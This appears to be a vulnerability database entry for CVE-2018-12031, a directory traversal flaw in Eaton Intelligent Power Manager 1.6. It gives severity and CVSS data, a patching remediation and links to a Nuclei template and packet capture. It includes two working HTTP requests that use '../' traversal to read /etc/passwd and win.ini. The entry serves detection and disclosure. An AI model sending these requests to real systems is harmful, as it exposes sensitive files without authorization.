| Title | Eaton Intelligent Power Manager 1.6 - Directory Traversal |
|---|---|
| Author | daffainfo |
| Severity | Critical |
| Impact | An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially leading to further compromise of the system. |
| Remediation | Apply the latest security patch or upgrade to a newer version of Eaton Intelligent Power Manager to mitigate this vulnerability. |
| CVSS Score | 9.8 |
| EPSS Score | 0.74839 |
| CVE ID | CVE-2018-12031 |
| CWE ID | CWE-22 |
| Tags | cve cve2018 edb lfi eaton vkev vuln |
Eaton Intelligent Power Manager v1.6 allows an attacker to include a file via directory traversal, which can lead to sensitive information disclosure, denial of service and code execution.
GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.6
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-12031.yaml
🦈 Packet Capture: ⬇️ Download cve-2018-12031.pcap
N/AN/A